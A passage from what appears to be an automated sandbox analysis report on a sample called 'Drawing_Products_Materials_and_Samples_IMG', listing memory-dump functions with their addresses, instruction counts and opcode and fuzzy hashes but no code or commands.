                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 953503f4552a861a5b6d21ce8348a28545d3688d64e25b93155def55f826fa30
                                                                                      • Instruction ID: d0a0802486dde3be933eccb15a2141cbb03835ed5ca96fc8bc3319ab9d2063c5
                                                                                      • Opcode Fuzzy Hash: 953503f4552a861a5b6d21ce8348a28545d3688d64e25b93155def55f826fa30
                                                                                      • Instruction Fuzzy Hash: DAF024343042155FC704AB29C814AA63BEAEFC672171944E9F404CB372DE21DC028790
                                                                                      Function 3741F188 Relevance: .0, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7236a47dd11cf8759572b76792c1e36135aa29fb83051211deaa32e1474a656c
                                                                                      • Instruction ID: 6afdd7b1661eb97ee5f50b2d50165bd760fc9e34b7f31204a6f33e656e98ed5a
                                                                                      • Opcode Fuzzy Hash: 7236a47dd11cf8759572b76792c1e36135aa29fb83051211deaa32e1474a656c
                                                                                      • Instruction Fuzzy Hash: BC01D271E00319DFDF44EFB9C8006EEBBB5AF48240F10856AD819F7251EB39A9028B90
                                                                                      Function 0009D01C Relevance: .0, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114295275.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_9d000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7702f8385f0036d50e4d020068b2684d3a1ef48502ad1f1975b07a934b7f0918
                                                                                      • Instruction ID: 377be9db5de4700f0a9294d083c17c955eaae45bc9727277669fc9ed32b7978c
                                                                                      • Opcode Fuzzy Hash: 7702f8385f0036d50e4d020068b2684d3a1ef48502ad1f1975b07a934b7f0918
                                                                                      • Instruction Fuzzy Hash: 7FF0C271404340AEEB508A15CD84B62FFD8EB91734F28C05AED5C0B282C27A9C44DAB0
                                                                                      Function 36A940D8 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8f8fb76004b5ddf081f7006b07a990fe45d47db6371b7fb56a1f0fd0b072503c
                                                                                      • Instruction ID: 573211c690ee1cf2ca06241f23f3a34226d0723d4d2a3538db57c583cfbd4471
                                                                                      • Opcode Fuzzy Hash: 8f8fb76004b5ddf081f7006b07a990fe45d47db6371b7fb56a1f0fd0b072503c
                                                                                      • Instruction Fuzzy Hash: 68F0F0759006089F8B50DFB899409EEBBFAFF4C200B00052AE505E3601EB3058028BF1
                                                                                      Function 36A9457F Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8a61f45f33d136cad93a66c7ddafdf0e46fe6b7289386b1ae6f6409bf6a46bce
                                                                                      • Instruction ID: b76b96e804b09c56c7685b642c822432baab6f743e19c9acefb217f01aac9baa
                                                                                      • Opcode Fuzzy Hash: 8a61f45f33d136cad93a66c7ddafdf0e46fe6b7289386b1ae6f6409bf6a46bce
                                                                                      • Instruction Fuzzy Hash: F5F0E2312053099FD7014F65D84498ABFF5FF86325B1440BAF9098B121CB318C56C790
                                                                                      Function 36A94590 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a79b1c627299fea10b2c7c6aea4860744563075d87c635a12711c14658b4fab
                                                                                      • Instruction ID: a741e415c66e518f2097184b10b153ecdf09b17082bb64831d4e3b1ea0c8b121
                                                                                      • Opcode Fuzzy Hash: 4a79b1c627299fea10b2c7c6aea4860744563075d87c635a12711c14658b4fab
                                                                                      • Instruction Fuzzy Hash: 02F03A35300605DFD700DF59D884D5ABBEAFF887257608169FA098B330CB719C52CB90
                                                                                      Function 3741ECD0 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1d88bf65eb4203bd3fb44906d92a2d11b1170437d9e7b4e8d2bf1315a86a3c4e
                                                                                      • Instruction ID: c1a2a69b5952931c37f83d19dbd638360c3729a4becda803f428f03305f06bfb
                                                                                      • Opcode Fuzzy Hash: 1d88bf65eb4203bd3fb44906d92a2d11b1170437d9e7b4e8d2bf1315a86a3c4e
                                                                                      • Instruction Fuzzy Hash: EDF082383002148FE708AF2AD858D6A77AAEFC57617158469F405CB361DF71EC018790
                                                                                      Function 36A94535 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82b2bbe205ed68dd4c9279bbdeef7301ab60544862b053c16b4abbec26aeb3ae
                                                                                      • Instruction ID: f2c02c35318f7f80e37502bb346226317a8c54aff96b501dc9560af1653b57dd
                                                                                      • Opcode Fuzzy Hash: 82b2bbe205ed68dd4c9279bbdeef7301ab60544862b053c16b4abbec26aeb3ae
                                                                                      • Instruction Fuzzy Hash: 63E04F3670061ACFE7049F98D844999B7E2FF88325B64417AF9058B230CB718C66CB94
                                                                                      Function 00112C31 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 310740205c1cec78f40dd2659b6bb3fa2261173b7bf31df553aa8948659b1ec8
                                                                                      • Instruction ID: adb3098fc6c96e5c4540c96bf054b271a53a4b1c4a5540f8d1d44b8c3cbc4238
                                                                                      • Opcode Fuzzy Hash: 310740205c1cec78f40dd2659b6bb3fa2261173b7bf31df553aa8948659b1ec8
                                                                                      • Instruction Fuzzy Hash: E6E08631E102659BCB10E6A5F8048EFBB35AD92311B55462AD45537140E770165AC650
                                                                                      Function 00112C38 Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a1aeb089b5c6d4c099dcf26f5bf5f75c5fa24785c7ebc585de14a45fb3760e6
                                                                                      • Instruction ID: 7416067d1d268cca1b368eb068e89fe88fad8f5a786ce195c397039f5b8e0651
                                                                                      • Opcode Fuzzy Hash: 3a1aeb089b5c6d4c099dcf26f5bf5f75c5fa24785c7ebc585de14a45fb3760e6
                                                                                      • Instruction Fuzzy Hash: 9CD05B31D2022A97CB10E7A5EC048DFFB38EED5321B904626D92437140FB702659C6E1
                                                                                      Function 0011AF68 Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2d5dde8ded2d4bf323c0dbad90d8323a27b3d78d6150e2f59df629114814ff40
                                                                                      • Instruction ID: 31a4d9881e4cd29cbcbc8958714926c4e2bbbc9abaf4dd1c825dd8ded61f291c
                                                                                      • Opcode Fuzzy Hash: 2d5dde8ded2d4bf323c0dbad90d8323a27b3d78d6150e2f59df629114814ff40
                                                                                      • Instruction Fuzzy Hash: F9D02E7B781A2343831E199DB0101B8AB4BDEC83A239A413AEA4CC3305CF21CC078190
                                                                                      Function 00119290 Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                      • Instruction ID: 0a9b6f39fa8f99fb8477a6418c02cff63a0da83091ac3558a73211a550e730d5
                                                                                      • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                      • Instruction Fuzzy Hash: 7AC0123720C1282AA228208F7C44AE3BA8CD2C13B5B220237F52C872409842AC8001B5
                                                                                      Function 36A9463E Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 02249cd8ac2d5cdad095abd3f9022425dc559a65d4197654dae608225edb7801
                                                                                      • Instruction ID: 850cd73dbbf1009809092daf96f837ad2ba1f71f998c840f89f12da50f0e251a
                                                                                      • Opcode Fuzzy Hash: 02249cd8ac2d5cdad095abd3f9022425dc559a65d4197654dae608225edb7801
                                                                                      • Instruction Fuzzy Hash: AFD09E36B041146B4B152A59A4048AE7F6AEFCA7617058026F91996600CE714912A795
                                                                                      Function 00116289 Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4de2a2564592040feac61bcec26b6d3b58f09c0c0260f7573e339cda11a03bb2
                                                                                      • Instruction ID: 34bc4ae4e8b8258104d299171803af8a99dae82fe1df8a8214ae0a2057e9f3ad
                                                                                      • Opcode Fuzzy Hash: 4de2a2564592040feac61bcec26b6d3b58f09c0c0260f7573e339cda11a03bb2
                                                                                      • Instruction Fuzzy Hash: 46D05E37A04108AEDF009E80F814AEE3364EB84721F108022F61495440C7325521AB50
                                                                                      Function 36A94640 Relevance: .0, Instructions: 17COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0a26a5bc45ab9c0f75367bff9f51d8d1d3cc94d04ddaa36bc229befdea033c6a
                                                                                      • Instruction ID: e11092119b2f8bf4db8f6354f8570d864d8c2254f401b3fd10ada471115ae7dc
                                                                                      • Opcode Fuzzy Hash: 0a26a5bc45ab9c0f75367bff9f51d8d1d3cc94d04ddaa36bc229befdea033c6a
                                                                                      • Instruction Fuzzy Hash: C2D0C736B001146B4B052A49A4048AE7F5EFFC97717048026F90597300CE714D1297D5
                                                                                      Function 0011B33D Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2c5e70f7080598c0ea89309607213b9b71c24d089d56b29176880d4141aa9da4
                                                                                      • Instruction ID: 546113375edbcec6f571922cccd8e2b81a72235fdac4649e8f9742a77f56684a
                                                                                      • Opcode Fuzzy Hash: 2c5e70f7080598c0ea89309607213b9b71c24d089d56b29176880d4141aa9da4
                                                                                      • Instruction Fuzzy Hash: CAD0673BB500099BDB049F98E8509DDF776FB98221B148116F915A3260C6319921DB94
                                                                                      Function 00116AC8 Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7b9f3ff4682e64d3263b90bf85eaf3533cd18c8cc5043cf1236c437150593a70
                                                                                      • Instruction ID: d118591233dc3fbde288b571ceb2e4ddee137d841891d33b79ddb56fa9cf2402
                                                                                      • Opcode Fuzzy Hash: 7b9f3ff4682e64d3263b90bf85eaf3533cd18c8cc5043cf1236c437150593a70
                                                                                      • Instruction Fuzzy Hash: DAD0A7324353094BEB84E771F646589372677C2310340C821E0081A115BE644597DE58
                                                                                      Function 36A93E8C Relevance: .0, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3911d6e79fffd4800a5a056b34a65c75e64b88b87eef7ec1d29c109dbc4433d1
                                                                                      • Instruction ID: d2cdd06cee943ef1631855ce39c71fe37a21a39a0bcea864820b75d0cce63425
                                                                                      • Opcode Fuzzy Hash: 3911d6e79fffd4800a5a056b34a65c75e64b88b87eef7ec1d29c109dbc4433d1
                                                                                      • Instruction Fuzzy Hash: 20D0927A7421208FC715DB69E454899BB75FF9A22632455BEE2018B622C6328846CB14
                                                                                      Function 00116AD0 Relevance: .0, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2e7ab520afe737ecd3d4b679680da721c69aafe13b8d18dc4fa02a9920de7e7a
                                                                                      • Instruction ID: fa4bcde4ed45c8651bf40b0736feadf5e6389d0d2dc93f9c37649e8aa2403baf
                                                                                      • Opcode Fuzzy Hash: 2e7ab520afe737ecd3d4b679680da721c69aafe13b8d18dc4fa02a9920de7e7a
                                                                                      • Instruction Fuzzy Hash: 78C0123583570D4FE644E771E946959772A7AC03147808825E00916125BF745597CE9C
                                                                                      Function 3741EC9F Relevance: .0, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f2ff210a98096977a984a9bc4e87209df0c6dd499a87b1831b68554382b5b172
                                                                                      • Instruction ID: 7d7ad5c4d2b15e3cb80701186270411fa5081e99a62356c2eb4b013975350980
                                                                                      • Opcode Fuzzy Hash: f2ff210a98096977a984a9bc4e87209df0c6dd499a87b1831b68554382b5b172
                                                                                      • Instruction Fuzzy Hash: EEC08C3500A3828FDF13CBA428860893FA0DE0724030620C2C485CB02BC008168BDB23

                                                                                      Non-executed Functions

                                                                                      Function 36A99880 Relevance: 3.5, Strings: 1, Instructions: 2232COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: K
                                                                                      • API String ID: 0-856455061
                                                                                      • Opcode ID: 45a22deb80902f7b115308953fc6266845900aefca2eff84b7a177e2796c974a
                                                                                      • Instruction ID: fdc568fe82fc133ebcda15a0e7482bb5caf645607f0d826a20da5b28c32bc77a
                                                                                      • Opcode Fuzzy Hash: 45a22deb80902f7b115308953fc6266845900aefca2eff84b7a177e2796c974a
                                                                                      • Instruction Fuzzy Hash: BA33D071C147198ADB11EF68C994ADDF7B1FF99300F61C69AD4486B221EB70AAC4CF81
                                                                                      Function 36A90040 Relevance: 1.8, Strings: 1, Instructions: 598COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: |L]4
                                                                                      • API String ID: 0-1468818224
                                                                                      • Opcode ID: 1061eff2ed9ca8a590f428b5f65eca17cfcd952cc971bd024b7b1a043d5061ff
                                                                                      • Instruction ID: ff37fc7ec94a2d750524a20c0c78950797fdfd7e579aa1db9baceae1c71e9ceb
                                                                                      • Opcode Fuzzy Hash: 1061eff2ed9ca8a590f428b5f65eca17cfcd952cc971bd024b7b1a043d5061ff
                                                                                      • Instruction Fuzzy Hash: 8F528E74E01228CFEB64DF65C984BDDBBB2BB89301F1081EAD409AB255DB359E81DF50
                                                                                      Function 36A987A0 Relevance: 1.6, Strings: 1, Instructions: 369COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "
                                                                                      • API String ID: 0-123907689
                                                                                      • Opcode ID: 68234c0135f45c244b87779be6a5bdbf9acec7f5cbc45d2b58b6f503e433a872
                                                                                      • Instruction ID: 0a044cf9bec0a9e1c47fd3a72d385d76e6b8f35005772acde2c99fdc46fda72f
                                                                                      • Opcode Fuzzy Hash: 68234c0135f45c244b87779be6a5bdbf9acec7f5cbc45d2b58b6f503e433a872
                                                                                      • Instruction Fuzzy Hash: 17F105B4E0125C8FEB14DFAAC9847DDBBF2BF84314F248569D808AB285D7789985CF50
                                                                                      Function 36A99871 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: K
                                                                                      • API String ID: 0-856455061
                                                                                      • Opcode ID: c2421dca144f426bb1f2996410ea4b4252c8b8baf5782aab205a48d3e89809bf
                                                                                      • Instruction ID: c4b71da0fb22cbfd55e203505c59d72b411f9114b61cbd96c6a962d0b881bcf9
                                                                                      • Opcode Fuzzy Hash: c2421dca144f426bb1f2996410ea4b4252c8b8baf5782aab205a48d3e89809bf
                                                                                      • Instruction Fuzzy Hash: 3BB11674D056198BEB14DFA9C8847DDFBF1EF89300F20C29AD4086B261EB74AA85CF40
                                                                                      Function 36A90676 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: |L]4
                                                                                      • API String ID: 0-1468818224
                                                                                      • Opcode ID: 05b47963cf759788e451325b31218501270cc5ce132b11f123da3d180459c5a2
                                                                                      • Instruction ID: 441ad926061546e2119773e5fed70f29563ace5b0ff8a58dd7d63e238e1764a5
                                                                                      • Opcode Fuzzy Hash: 05b47963cf759788e451325b31218501270cc5ce132b11f123da3d180459c5a2
                                                                                      • Instruction Fuzzy Hash: 40A19E74E01228CFEB65DF64C854BD9BBB2BF4A301F5085E9D809A7250DB319E81DF51
                                                                                      Function 36A90856 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: |L]4
                                                                                      • API String ID: 0-1468818224
                                                                                      • Opcode ID: 90be2f1d1d6c111b36cb5605971654c792d0d60713760fe28d9ef4ceb3c0b81f
                                                                                      • Instruction ID: 977a2fde0c7242bb19a0b1253bb1f3e57fde1bb9e7c96b433f2236a533d9f7ea
                                                                                      • Opcode Fuzzy Hash: 90be2f1d1d6c111b36cb5605971654c792d0d60713760fe28d9ef4ceb3c0b81f
                                                                                      • Instruction Fuzzy Hash: A6516D74A01228CFDB69DF64C854B9ABBB2FF4A301F5085E9D80AA7350DB359E81CF54
                                                                                      Function 373672C9 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;]4U
                                                                                      • API String ID: 0-3256962003
                                                                                      • Opcode ID: 66f2b718cd39df054b3147d1879f081e253b7d24638eff3bed34bd8db2f79ad3
                                                                                      • Instruction ID: dd19f1cc241ed989ed8da7f35423c98c7c334ff0f47697ea0a601f817e4275dc
                                                                                      • Opcode Fuzzy Hash: 66f2b718cd39df054b3147d1879f081e253b7d24638eff3bed34bd8db2f79ad3
                                                                                      • Instruction Fuzzy Hash: 0541E7B4D01248CBEB18DFAAC9947DDBBF2AF89304F60C12AC418BB259DB355946CF50
                                                                                      Function 37413550 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ,
                                                                                      • API String ID: 0-3772416878
                                                                                      • Opcode ID: 62bf52b9a1f97b882d6b1c2d76e263d7e70a0fd7388adf488c658032db093738
                                                                                      • Instruction ID: 2ed13f212ac728b68fc27af18df6bf526b5c52dd2273ea8d14fc4ed0f4d2ed86
                                                                                      • Opcode Fuzzy Hash: 62bf52b9a1f97b882d6b1c2d76e263d7e70a0fd7388adf488c658032db093738
                                                                                      • Instruction Fuzzy Hash: 76410774D01248CBEB14DFAAD8546EEBBF2BF89300F24D42AC418BB254EB346902CF55
                                                                                      Function 373638B8 Relevance: .7, Instructions: 695COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eeb48623b72f4451527b23140df4f82265a99dbdb117b53a55959d2e12ef41dc
                                                                                      • Instruction ID: 763c94f0cc6687e80608a04b36a7ab7b3c7b4353cdbd785a22f911537ea23304
                                                                                      • Opcode Fuzzy Hash: eeb48623b72f4451527b23140df4f82265a99dbdb117b53a55959d2e12ef41dc
                                                                                      • Instruction Fuzzy Hash: 26826D74E052288FEB64DF69C994BDDBBB2BB89300F1081E9E40DA7265DB315E81DF50
                                                                                      Function 3736B6B0 Relevance: .3, Instructions: 274COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
